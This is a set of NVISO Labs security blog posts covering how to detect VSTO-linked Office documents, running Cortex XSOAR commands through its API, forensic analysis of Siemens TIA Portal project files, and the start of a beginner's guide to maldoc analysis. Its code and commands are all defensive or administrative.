NVISO participated in the initiative for the first time, initiated and led internally by Carola Wondrak. “It is really a win-win-win situation for all participating parties”, she said. “Firstly, we can see what future employees expect of the company of the future and learn about their environment. Secondly, we do world-class work here and it is beneficial for us to showcase this and put our pin on the map.” Grinning, she adds, “And thirdly, as the saying goes: you have only understood something well if you can explain it to a child.”

All of our German offices participated enthusiastically and welcomed our young guests on-site in Frankfurt and Munich for the day. “I don’t want to wait a year to come here,” said one of our participants in Frankfurt, while another girl from Munich is now planning her internship with us. This great feedback was due to an engaging agenda for the day, ranging from a live hacking demo of a well-known app to presentations of the different fields of work within NVISO. Finding out what is “typically me”, instead of what is gender-based, is a first step towards identifying potential future career paths.

We have an employee resource program called NEST (NVISO Equality: Stronger Together!) working on the continuous improvement of NVISO’s posture on diversity and inclusion. Through NEST, NVISO commits to remaining a great working environment where all kinds of diversity are respected, as well as to leading by example to bring significant added value to the whole European cybersecurity community.

We believe we made an impact – if the survey results are still accurate today, 49% of girls attending Girls Day said they can imagine working in the field that their host company operates in. We are looking forward to welcoming some Girls Day alumni among our new joiners!

If you have questions or want to apply straight away, please reach out to the Girls Day initiative lead, Carola Wondrak, at [email protected].

✇ NVISO Labs

Analyzing VSTO Office Files

By: didiernviso

VSTO Office files are Office document files linked to a Visual Studio Office File application. When opened, they launch a custom .NET application. There are various ways to achieve this, including methods to serve the VSTO files via an external web server.

An article was recently published on the creation of these document files for phishing purposes, and since then we have observed some VSTO Office files on VirusTotal.

Analysis Method (OOXML)

Sample Trusted Updater.docx (0/60 detections) first appeared on VirusTotal on 20/04/2022, 6 days after the publication of said article. It is a .docx file and, as can be expected, it does not contain VBA macros (by definition, .docm files contain VBA macros, .docx files do not):

Figure 1: typical VSTO document does not contain VBA code

Taking a look at the ZIP container (a .docx file is an OOXML file, i.e. a ZIP container containing XML files and other file types), there are some aspects that we don’t usually see in “classic” .docx files:

Figure 2: content of sample file

Worth noting is the following:

  1. The presence of files in a folder called vstoDataStore. These files contain metadata for the execution of the VSTO file.
  2. The timestamp of some of the files is not 1980-01-01, as it should be with documents created with Microsoft Office applications like Word.
  3. The presence of a docProps/custom.xml file.

Checking the content of the custom document properties file, we find 2 VSTO related properties: _AssemblyLocation and _AssemblyName:

Figure 3: custom properties _AssemblyLocation and _AssemblyName

The _AssemblyLocation in this sample is a URL to download a VSTO file from the Internet. We were not able to download the VSTO file, and neither was VirusTotal at the time of scanning. Thus we cannot determine whether this sample is a PoC, part of a red team engagement or truly malicious. It is a fact, though, that this technique was known and used by red teams like ours prior to the publication of said article.

There’s little information regarding domain login03k[.]com, except that it appeared last year in a potential phishing domain list, and that VirusTotal tags it as DGA.

If the document uses a local VSTO file, then the _AssemblyLocation is not a URL:

Figure 4: referencing a local VSTO file
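
Whether the referenced VSTO file is remote or local, the custom properties give it away. To triage similar samples at scale, these properties can also be pulled straight from the OOXML container with a few lines of Python. The sketch below is our own illustration (it is not one of the tools used in this analysis), and the sample file name is just a placeholder:

import re
import sys
import zipfile


def get_vsto_properties(path):
    """Extract VSTO-related custom document properties from an OOXML file."""
    with zipfile.ZipFile(path) as container:
        try:
            custom_xml = container.read("docProps/custom.xml").decode("utf-8", errors="replace")
        except KeyError:
            return {}  # no custom document properties part present
    # Each property looks like: <property ... name="_AssemblyLocation"><vt:lpwstr>value</vt:lpwstr></property>
    return dict(re.findall(r'name="(_Assembly\w+)">\s*<vt:lpwstr>([^<]*)</vt:lpwstr>', custom_xml))


if __name__ == "__main__":
    # Example usage: python vsto_props.py sample.docx
    for name, value in get_vsto_properties(sys.argv[1]).items():
        print(f"{name}: {value}")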

Analysis Method (OLE)

OLE files (the default Office document format prior to Office 2007) can also be associated with VSTO applications. We have found several examples on VirusTotal, but none that are malicious. Therefore, to illustrate how to analyze such a sample, we converted the .docx maldoc from our first analysis to a .doc maldoc.

Figure 5: analysis of .doc file

Taking a look at the metadata with oledump‘s plugin_metadata, we find the _AssemblyLocation and _AssemblyName properties (with the URL):

Figure 6: custom properties _AssemblyLocation and _AssemblyName

Notice that this metadata does not appear when you use oledump’s option -M:

Figure 7: olefile’s metadata result

Option -M extracts the metadata using olefile’s methods, and the olefile Python module (upon which oledump relies) does not (yet) parse user-defined properties.

Conclusion

To analyze Office documents linked with VSTO apps, search for custom properties _AssemblyLocation and _AssemblyName.

To detect Office documents like these, we have created some YARA rules for our VirusTotal hunting. You can find them on our Github here. Some of them are rather generic by design and will generate too many hits for use in a production environment; they were originally designed for hunting on VT.

We will discuss these rules in detail in a follow-up blog post, but we already wanted to share them with you.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Execute Commands Using The API

By: wstinkens

Introduction

Every automated task in Cortex XSOAR relies on executing commands from integrations or automations either in a playbook or directly in the incident war room or playground. But what if you wanted to incorporate a command or automation from Cortex XSOAR into your own custom scripts? For that you can use the API.

In the previous post in this series, we demonstrated how to use the Cortex XSOAR API in an automation. In this blog post, we will dive deeper into the API and show you how to execute commands using the Cortex XSOAR API.

To enable you to do this in your own automations, we have created a nitro_execute_api_command function which is available on the NVISO Github:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_execute_api_command.py

Cortex XSOAR API Endpoints

When reviewing the Cortex XSOAR API documentation, you can find the following API endpoints:

  • /entry: API to create an entry (markdown format) in existing investigation
  • /entry/execute/sync: API to create an entry (markdown format) in existing investigation

Based on the description it might not be obvious, but both can be used to execute commands using the API. An entry in an existing investigation can contain a command which can be executed in the context of an incident or in the Cortex XSOAR playground.

We will be using the /entry/execute/sync endpoint, because this will wait for the command to be completed and the API request will return the command’s result. The /entry endpoint only creates an entry in the war room/playground without returning the result.

An HTTP POST request to the /entry/execute/sync endpoint accepts the following request body:

{
  "args": {
    "string": "<<_advancearg>>"
  },
  "data": "string",
  "id": "string",
  "investigationId": "string",
  "markdown": true,
  "primaryTerm": 0,
  "sequenceNumber": 0,
  "version": 0
}

To execute a simple print command in the context of an incident, you can use the following curl command:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "423","data": "!Print value=\"Printed by API\""}
        '

The body of the HTTP POST request should contain the following keys:

  • investigationId: the XSOAR Incident ID
  • data: the command to execute

After executing the HTTP POST request, you will see the entry created in the incident war room:
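
The same call can of course be scripted instead of using curl. The following minimal Python sketch (our own illustration using the requests library; the base URL, API key and incident ID are placeholders) posts a command to /entry/execute/sync and prints the contents of the returned war room entries:

import requests

XSOAR_URL = "https://xsoar.dev/acc_wstinkens"  # placeholder XSOAR base URL
API_KEY = "**********************"             # placeholder API key


def execute_command(command, investigation_id):
    """Execute a command in the given investigation and return the created entries."""
    response = requests.post(
        f"{XSOAR_URL}/entry/execute/sync",
        headers={
            "Authorization": API_KEY,
            "Content-Type": "application/json",
            "Accept": "application/json",
        },
        json={"investigationId": investigation_id, "data": command},
    )
    response.raise_for_status()
    return response.json()  # list of war room entries created by the command


# Example: create a war room entry in incident 423
for entry in execute_command('!Print value="Printed by API"', "423"):
    print(entry.get("contents"))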

When you do not require the command to be executed in the context of a Cortex XSOAR incident, it is possible to execute it in the playground. For this, you should replace the value of the investigationId key with the playground ID.

This can be found by using the /investigations/search API endpoint:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/investigations/search' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"filter": {"type": [9]}}'

This will return the following response body:

{
  "total": 1,
  "data": [
    {
      "id": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
      "version": 2,
      "cacheVersn": 0,
      "modified": "2022-04-08T14:20:00.262348298Z",
      "name": "Playground",
      "users": [
        "wstinkens"
      ],
      "status": 0,
      "type": 9,
      "reason": null,
      "created": "2022-04-08T13:56:03.294180041Z",
      "closed": "0001-01-01T00:00:00Z",
      "lastOpen": "0001-01-01T00:00:00Z",
      "creatingUserId": "wstinkens",
      "details": "",
      "systems": null,
      "tags": null,
      "entryUsers": [
        "wstinkens"
      ],
      "slackMirrorType": "",
      "slackMirrorAutoClose": false,
      "mirrorTypes": null,
      "mirrorAutoClose": null,
      "category": "",
      "rawCategory": "",
      "runStatus": "",
      "highPriority": false,
      "isDebug": false
    }
  ]
}

By using this id as the investigationId key in the request body of an HTTP POST request to /entry/execute/sync, the command will be executed in the Cortex XSOAR playground:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!Print value=\"Printed by API\""}'

By default, the Markdown output of the command visible in the war room/playground will be returned by the HTTP POST request:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!azure-sentinel-list-tables"}'

This will return the result of the command as Markdown in the contents key:

[
  {
    "id": "[email protected]",
    "version": 1,
    "cacheVersn": 0,
    "modified": "2022-04-27T10:49:23.872137691Z",
    "type": 1,
    "created": "2022-04-27T10:49:23.87206309Z",
    "incidentCreationTime": "2022-04-27T10:49:23.87206309Z",
    "retryTime": "0001-01-01T00:00:00Z",
    "user": "",
    "errorSource": "",
    "contents": "### Azure Sentinel (NITRO) List Tables\n401 tables found in Sentinel Log Analytics workspace.\n|Table name|\n|---|\n| UserAccessAnalytics |\n| UserPeerAnalytics |\n| BehaviorAnalytics |\n| IdentityInfo |\n| ProtectionStatus |\n| SecurityNestedRecommendation |\n| CommonSecurityLog |\n| SecurityAlert |\n| SecureScoreControls |\n| SecureScores |\n| SecurityRegulatoryCompliance |\n| SecurityEvent |\n| SecurityRecommendation |\n| SecurityBaselineSummary |\n| Update |\n| UpdateSummary |\n",
    "format": "markdown",
    "investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
    "file": "",
    "fileID": "",
    "parentId": "[email protected]",
    "pinned": false,
    "fileMetadata": null,
    "parentContent": "!azure-sentinel-list-tables",
    "parentEntryTruncated": false,
    "system": "",
    "reputations": null,
    "category": "artifact",
    "note": false,
    "isTodo": false,
    "tags": null,
    "tagsRaw": null,
    "startDate": "0001-01-01T00:00:00Z",
    "times": 0,
    "recurrent": false,
    "endingDate": "0001-01-01T00:00:00Z",
    "timezoneOffset": 0,
    "cronView": false,
    "scheduled": false,
    "entryTask": null,
    "taskId": "",
    "playbookId": "",
    "reputationSize": 0,
    "contentsSize": 10315,
    "brand": "Azure Sentinel (NITRO)",
    "instance": "QA-Azure Sentinel (NITRO)",
    "InstanceID": "e39e69f0-3882-4478-824d-ac41089381f2",
    "IndicatorTimeline": [],
    "Relationships": null,
    "mirrored": false
  }
]

To return the data of the executed command as JSON, you should add the raw-response=true parameter to your command:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!azure-sentinel-list-tables raw-response=true"}'

This will return the result of the command as JSON in the contents key:

[
  {
    "id": "[email protected]",
    "version": 1,
    "cacheVersn": 0,
    "modified": "2022-04-27T06:34:59.448622878Z",
    "type": 1,
    "created": "2022-04-27T06:34:59.448396275Z",
    "incidentCreationTime": "2022-04-27T06:34:59.448396275Z",
    "retryTime": "0001-01-01T00:00:00Z",
    "user": "",
    "errorSource": "",
    "contents": [
      "UserAccessAnalytics",
      "UserPeerAnalytics",
      "BehaviorAnalytics",
      "IdentityInfo",
      "ProtectionStatus",
      "SecurityNestedRecommendation",
      "CommonSecurityLog",
      "SecurityAlert",
      "SecureScoreControls",
      "SecureScores",
      "SecurityRegulatoryCompliance",
      "SecurityEvent",
      "SecurityRecommendation",
      "SecurityBaselineSummary",
      "Update",
      "UpdateSummary",
    ],
    "format": "json",
    "investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
    "file": "",
    "fileID": "",
    "parentId": "[email protected]",
    "pinned": false,
    "fileMetadata": null,
    "parentContent": "!azure-sentinel-list-tables raw-response=\"true\"",
    "parentEntryTruncated": false,
    "system": "",
    "reputations": null,
    "category": "artifact",
    "note": false,
    "isTodo": false,
    "tags": null,
    "tagsRaw": null,
    "startDate": "0001-01-01T00:00:00Z",
    "times": 0,
    "recurrent": false,
    "endingDate": "0001-01-01T00:00:00Z",
    "timezoneOffset": 0,
    "cronView": false,
    "scheduled": false,
    "entryTask": null,
    "taskId": "",
    "playbookId": "",
    "reputationSize": 0,
    "contentsSize": 9402,
    "brand": "Azure Sentinel (NITRO)",
    "instance": "QA-Azure Sentinel (NITRO)",
    "InstanceID": "e39e69f0-3882-4478-824d-ac41089381f2",
    "IndicatorTimeline": [],
    "Relationships": null,
    "mirrored": false
  }
]

nitro_execute_api_command()

Executing commands through the API can be useful even in Cortex XSOAR automations. When using automations, you will see that results are only written to the war room/playground and to context data after the automation has finished. If you, for example, want to perform a task which requires the entry ID of a war room/playground entry or of a file, you would need to run two consecutive automations. Another solution is to execute the command through the Cortex XSOAR API, which creates the entry in the war room/playground during the runtime of your automation and returns its entry ID. Later in this post, we will provide an example of how this can be used.

To execute commands through the API from automations, we have created the nitro_execute_api_command function:

def nitro_execute_api_command(command: str, args: dict = None):
    """Execute a command using the Demisto REST API

    :type command: ``str``
    :param command: command to execute
    :type args: ``dict``
    :param args: arguments of command to execute

    :return: list of returned results of command
    :rtype: ``list``
    """
    args = args or {}

    # build the command string in the form !Command arg1="val1" arg2="val2"
    cmd_str = f"!{command}"

    for key, value in args.items():
        if isinstance(value, dict):
            value = json.dumps(json.dumps(value))
        else:
            value = json.dumps(value)
        cmd_str += f" {key}={value}"

    results = nitro_execute_command("demisto-api-post", {
        "uri": "/entry/execute/sync",
        "body": json.dumps({
            "investigationId": demisto.incident().get('id', ''),
            "data": cmd_str
        })
    })

    if not isinstance(results, list) \
            or not len(results)\
            or not isinstance(results[0], dict):
        return []

    results = results[0].get("Contents", {}).get("response", [])
    for result in results:
        if "contents" in result:
            result["Contents"] = result.pop("contents")

    return results
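As a quick illustration, the Azure Sentinel command from the curl examples above could be executed from an automation like this (a sketch; the command and its output depend on the integrations enabled in your environment):

# execute the command in the context of the current incident and
# grab the JSON contents of the first returned entry
results = nitro_execute_api_command(
    command="azure-sentinel-list-tables",
    args={"raw-response": "true"},
)
table_names = results[0].get("Contents", []) if results else []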

To use this function, the Demisto REST API integration needs to be enabled. How to set this up is described in the previous post in this series.

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_api_command in all your custom automations.

Incident Evidences Example

To demonstrate the use case for executing commands through the Cortex XSOAR API in automations, we will again build upon the example of adding evidences to the incident Evidence Board. In the previous posts, we added tags to war room/playground entries which we then used in a second automation to search for them and add them to the incident Evidence Board. This required a playbook which executes both automations consecutively.

Now we will show you how to do this through the Cortex XSOAR API, negating the requirement of a playbook.

First we need an automation which creates an entry in the incident war room:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
title = "Malware Mitigation Status"

return_results(
    CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True),
        raw_response=results
    )
)

This automation creates an entry in the incident war room:

We call this automation using the nitro_execute_api_command function:

results = nitro_execute_api_command(command='MalwareStatus')

The entry ID of the war room entry will be available in the returned result in the id key:

[
    {
        "IndicatorTimeline": [],
        "InstanceID": "ScriptServicesModule",
        "Relationships": null,
        "brand": "Scripts",
        "cacheVersn": 0,
        "category": "artifact",
        "contentsSize": 152,
        "created": "2022-04-27T08:37:29.197107197Z",
        "cronView": false,
        "dbotCreatedBy": "wstinkens",
        "endingDate": "0001-01-01T00:00:00Z",
        "entryTask": null,
        "errorSource": "",
        "file": "",
        "fileID": "",
        "fileMetadata": null,
        "format": "markdown",
        "id": "[email protected]",
        "incidentCreationTime": "2022-04-27T08:37:29.197107197Z",
        "instance": "Scripts",
        "investigationId": "6974",
        "isTodo": false,
        "mirrored": false,
        "modified": "2022-04-27T08:37:29.197139897Z",
        "note": false,
        "parentContent": "!MalwareStatus",
        "parentEntryTruncated": false,
        "parentId": "[email protected]",
        "pinned": false,
        "playbookId": "",
        "recurrent": false,
        "reputationSize": 0,
        "reputations": null,
        "retryTime": "0001-01-01T00:00:00Z",
        "scheduled": false,
        "startDate": "0001-01-01T00:00:00Z",
        "system": "",
        "tags": null,
        "tagsRaw": null,
        "taskId": "",
        "times": 0,
        "timezoneOffset": 0,
        "type": 1,
        "user": "",
        "version": 1,
        "Contents": "### Malware Mitigation Status\n|DetectionStatus|FileName|FilePath|\n|---|---|---|\n| Detected | malware.exe | c:\\temp |\n| Prevented | evil.exe | c:\\temp |\n"
    }
]

Next, we get all entry IDs from the results of nitro_execute_api_command:

entry_ids = [result.get('id') for result in results]

Finally we loop through all entry IDs in the nitro_execute_api_command result and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The war room entry created by the command executed through the Cortex XSOAR API will now be added to the Evidence Board of the incident:

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-6/cortex-xsoar-admin/incidents/incident-management/war-room-overview

https://xsoar.pan.dev/docs/concepts/concepts#playground

https://xsoar.pan.dev/marketplace/details/DemistoRESTAPI

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the SOAR engineering team lead, he is responsible for the development and deployment of automated workflows which enable the NVISO SOC analysts to detect attackers faster in customers' environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can contact Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

Investigating an engineering workstation – Part 3

By: Olaf Schwarz

In our third blog post (parts one and two are referenced above) we will focus on information we can get from the projects themselves.

You may remember from Part 1 that a project created with the TIA Portal is not a single file. So far we talked about files with the “.apXX” extension, like “.ap15_1” in our example. Actually these files are used to open projects in the TIA Portal but they do not contain all the information that makes up a project. If you open an “.ap15_1” file there is not much to see as demonstrated below:

Figure 1: .ap15_1 file content excerpt

The file we are actually looking for is named “PEData.plf” and located in the “System” folder stored within the “root” folder of the project. The “root” folder is also the location of the “.ap15_1” file.

Figure 2: Showing content of project “root” and “System” folder

As demonstrated below, the “PEData.plf” file is a binary file format, and reviewing its content does not show any useful information at first sight.

Figure 3: Hexdump of a PEData.plf file

But we can get useful information from the file if we know what to look for. When we compare two “PEData” files of a project where just some slight changes were performed, we can get a first idea of how the file is structured. In the following example, two variables were added to a data block, the project was saved and downloaded to the PLC, and the TIA Portal was closed, saving all changes to the project. (If you are confused by the wording “downloaded to the PLC”, do not worry about it too much for now. This is just the wording for getting the logic deployed on the PLC.)

The tool colordiff can provide a nice side-by-side view, with the differences highlighted, by using the following command. (The files were renamed for a better understanding):

colordiff -y <(xxd Original_state_PEData.plf) <(xxd CHANGES_MADE_PEData.plf)

Figure 4: colordiff output showing appended changes

The output shows that the changes made are appended to the “PEData.plf” file. Figure 4 shows the starting offset of the change, in our case at offset 0xA1395. We have performed multiple tests by applying small changes. In all cases, data was appended to the “PEData.plf” file. No data was overwritten or changed in earlier sections of the file.

To further investigate the changes, we extract the changes to a file:

dd skip=660373 if=CHANGES_MADE_PEData.plf of=changes.bin bs=1

We set the block size of the dd command to 1 and skip the first 660373 blocks (0xA1395 in hex). As demonstrated below, the resulting file, named “changes.bin”, has the size of 16794 bytes. Exactly the difference in size between the two files we compared.

Figure 5: Showing file sizes of compared files and the extracted changes
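The same extraction can be done in a few lines of Python instead of dd. This is a rough sketch that assumes, as observed in our tests, that changes are purely appended to the file:

# carve everything that was appended to the changed PEData.plf file
with open("Original_state_PEData.plf", "rb") as f:
    original_size = len(f.read())           # 660373 (0xA1395) in our example

with open("CHANGES_MADE_PEData.plf", "rb") as f:
    changed = f.read()

with open("changes.bin", "wb") as f:
    f.write(changed[original_size:])         # 16794 bytes in our example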

Trying to reverse engineer which bytes of the appended data might be header data and which are actual content is beyond the scope of this series of blog posts. But with the changes extracted and the use of tools like strings, we still get an insight into the activities.

Figure 6: Parts of strings output when run against “changes.bin” file

Looking through the whole output, we can immediately find out that the change ends with the string “##CLOSE##”. This is also the only appearance of this specific string in the extracted changes. Further, we can see that not far above the “##CLOSE##” string there is the string “$$COMMIT$”. In this case we find two occurrences of this specific string; we will explain later why this might be the case.

Figure 7: String occurrences of “##CLOSE” and “$$COMMIT$” at the end of changes

The next string of interest is “PLUSBLOCK”; if you review figure 6, you will already notice it in the 8th line. In the current example we get three occurrences of this string. No worries if you have already lost track of which string occurred how many times; we will provide an overview shortly. Before showing the overview, it will help to review more of the strings output.

Below you can review the changes we introduced in “CHANGES_MADE_PEData.plf” compared to the project state represented by “Original_state_PEData.plf”.

Figure 8: Overview of changes made to the project

In essence, we added two variables to “Data_block_1”. These are the variables “DB_1_var3” and “DB_1_var4”. These variable names are also present in the extracted changes, as shown in figure 9. Please note that this block occurs twice in our extracted changes and also contains the already existing variable names “DB_1_var1” and “DB_1_var2”.

Figure 9: Block in “changes.bin” containing variables names

One section we need to mention before we can start drawing conclusions from the overview is the “DownloadLog” section, showing up just once in our changes. We will have a look at the content of this section, and at the behaviour we observed, later in this blog post.

Overview and behaviour

As promised earlier, we finally start showing an overview.

Line number String / Section of interest
8 PLUSBLOCK
22 Section containing the variable names
35 $$COMMIT$
48 PLUSBLOCK
58 Section containing the variable names
61 PLUSBLOCK
78 Start of “DownloadLog”
101 $$COMMIT$
109 ##CLOSE#
Table 1: Overview of string occurrences in “changes.bin”

The following steps were performed while introducing the change:

  1. Copy existing project to new location & open the project from the new location using the TIA Portal
  2. Adding variables “DB_1_var3” and “DB_1_var4” to the already existing datablock “Data_block_1”
  3. Saving the project
  4. Downloading the project to the PLC
  5. Closing the TIA Portal and save all changes

The “$$COMMIT$” string in lines 35 and 101 seems to align with our actions in step 3 (saving the project) and steps 4 & 5 (downloading the project, closing and saving). Following this theory, if we skipped step 3, we should not get two occurrences of the variable name section and should not see the string “$$COMMIT$” twice. In a second series of tests we did exactly this, resulting in the following overview (of course the line numbers differ, as a different project was used in testing).

Line number String / Section of interest
6 PLUSBLOCK
28 Section containing the variable names
35 PLUSBLOCK
40 Start of “DownloadLog”
70 $$COMMIT$
75 ##CLOSE#
Table 2: Overview of string occurrences in “changes.bin” for test run 2

This pretty much looks like what we expected: we only see one “$$COMMIT$”, one section with the variable names and one “PLUSBLOCK” less. To further validate the theory, we did another test by creating a new, empty project and downloading it to the PLC (State 1). Afterwards we performed the following steps to reach State 2:

  1. Adding a new data block containing two variables
  2. Saving the project
  3. Adding two more variables to the data block (4 in total now)
  4. Saving the project
  5. Downloading the project to the PLC
  6. Closing the TIA Portal and save all changes

If we again just focus on the additions made to the “PEData.plf” we will get the following overview. Entries with “####” are comments we added to reference the steps mentioned above.

Line number String / Section of interest
11 PLUSBLOCK
32 Start of “DownloadLog”
194 Section containing the variable names (first two variables)
223 $$COMMIT$
#### Comment: above added by step 2 (saving the project)
237 PLUSBLOCK
266 Section containing the variable names (all four variables)
270 $$COMMIT$
#### Comment: above added by step 4 (saving the project)
273 PLUSBLOCK
278 Section containing the variable names (all four variables)
290 PLUSBLOCK
456 Start of “DownloadLog”
509 $$COMMIT$
513 ##CLOSE#
#### Comment: added by step 5 and 6
Table 3: Overview of string occurrences in test run 3

The occurrence of the “DownloadLog” at line 32 might come as a surprise to you at this point in time. As already stated earlier, the explanation of the “DownloadLog” will follow later. For now just accept that it is there.

Conclusions so far

Based on the observations described above, we can draw the following conclusions:

  1. Adding a change to a project and saving it will cause the following structure: “PLUSBLOCK”,…changes…, “$$COMMIT$”
  2. Adding a change to a project, saving it and closing the TIA Portal will cause the following structure: “PLUSBLOCK”,…changes…, “$$COMMIT$”,”##CLOSE#”
  3. Downloading changes to a PLC and choosing save when closing the TIA Portal causes the following structure: “PLUSBLOCK”,…changes…, “PLUSBLOCK”,DownloadLog, “$$COMMIT$”,”##CLOSE”

DownloadLog

The “DownloadLog” is an XML-like structure, present in clear text in the PEData.plf file. Figure 10 shows an example of a “DownloadLog”.

Figure 10: DownloadLog structure example

As you might have guessed already, the “DownloadTimeStamp” represents the date and time the changes were downloaded to the PLC. Date and time are written as an Epoch Unix timestamp and can easily be converted with tools like CyberChef using the appropriate recipe. If we take the last value (“1641820395551408400”) from the “DownloadLog” example and convert it, we learn that a download to the PLC happened on Mon 10 January 2022 13:13:15.551 UTC. Epoch Unix timestamps are by definition in UTC, and we could confirm that the times in our tests were created based on UTC and not on the local system time. As also demonstrated above, the “DownloadLog” can contain past timestamps, showing a kind of history of download activities. Remember what was mentioned above: changes to a project are appended to the file, and this also holds for the “DownloadLog”. So an existing “DownloadLog” is not updated; instead a new one is appended and extended with a new “DownloadSet” node. Unfortunately, it is not as straightforward as it may sound at the moment.
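The conversion can also be done in Python; the “DownloadTimeStamp” values are nanoseconds since the Unix epoch (a small sketch using the value from the example above):

from datetime import datetime, timezone

ts = 1641820395551408400                    # DownloadTimeStamp value (nanoseconds)
seconds, nanos = divmod(ts, 1_000_000_000)
dt = datetime.fromtimestamp(seconds, tz=timezone.utc).replace(microsecond=nanos // 1000)
print(dt)                                   # 2022-01-10 13:13:15.551408+00:00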

Starting again with a fresh project, configuring the hardware (setting the IP-Address for the PLC), saving the project, downloading the project to the PLC and closing the TIA Portal (Save all changes), we ended up with one “DownloadLog” containing one “DownloadTimeStamp” in the PEData.plf file:

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″

As next step we added a data block, again saving the project, downloading it to the PLC and closing the TIA Portal saving all changes. This resulted in the following overview of “DownloadLog” entries:

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  2. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  3. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″

The first “DownloadLog” is repeated, and a third “DownloadLog” is added containing the date and time of the most recent download activity. So overall, two “DownloadLogs” were added.

In the third step we added variables to the data block, followed by saving, downloading and closing the TIA Portal with save.

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  2. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  3. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″
  4. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″
    • DownloadTimeStamp=”1639754601898276800″

This time only one “DownloadLog” was added, which repeats the content of “DownloadLog” number 3 and also contains the most recent date and time. We repeated the same actions of step 3 again and observed the same behaviour: one “DownloadLog” is added, which repeats the content of the previous “DownloadLog” and adds the date and time of the current download activity. After doing this, we did not observe any more “DownloadLog” entries being added to the “PEData.plf” file, no matter which changes we introduced and downloaded to the PLC. In further testing we encountered different behaviours regarding whether the “DownloadLog” is repeated as a whole or not (occurrence 2 in the examples above). Currently we believe that only 4 “DownloadLog” entries showing new download activity are added to the “PEData.plf” file; if a “DownloadLog” entry is just repeated, it is not counted.

Conclusion on the DownloadLog

  1. When “DownloadTimeStamp” entries are present in a “PEData.plf” file, they do represent download activity.
  2. If there are 4 unique “DownloadLog” entries in a “PEData.plf” file, we cannot tell (from the “PEData.plf” file) if there was any download activity after the most recent timestamp in the last occurrence of a unique “DownloadLog” entry.

Overall Conclusions & Outlook

We have shown that changes made to a project can be isolated and, to a certain extent, analysed with tools like strings, xxd or diff. Further, we have demonstrated that we can reconstruct download activity from a project, at least up to the first four download actions. Last but not least, we can conclude that more testing and research has to be performed to get a better understanding of the data points that can be extracted from projects. For example, we did not perform research to see if we can identify strings representing the project name or the author name in the “PEData.plf” file without knowing them upfront. We also only looked at Siemens TIA Portal version 15.1; different versions might produce other formats or behave in a different way. Finally, Siemens is not the only vendor that plays a relevant role in this area.

In the next part we will have a look at network traffic observed in our testing. Stay tuned!

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Analyzing a “multilayer” Maldoc: A Beginner’s Guide

By: didiernviso

In this blog post, we will not only analyze an interesting malicious document, but we will also demonstrate the steps required to get you up and running with the necessary analysis tools. There is also a howto video for this blog post.

I was asked to help with the analysis of a PDF document containing a DOCX file.

The PDF is REMMITANCE INVOICE.pdf, and can be found on VirusTotal, MalwareBazaar and Malshare (you don’t need a subscription to download from MalwareBazaar or Malshare, so everybody that wants to, can follow along).

The sample is interesting for analysis, because it involves 3 different types of malicious documents.
And this blog post will also be different from other maldoc analysis blog posts we have written, because we show how to do the analysis on a machine with a pristine OS and without any preinstalled analysis tools.


To follow along, you just need to be familiar with operating systems and their command-line interface.
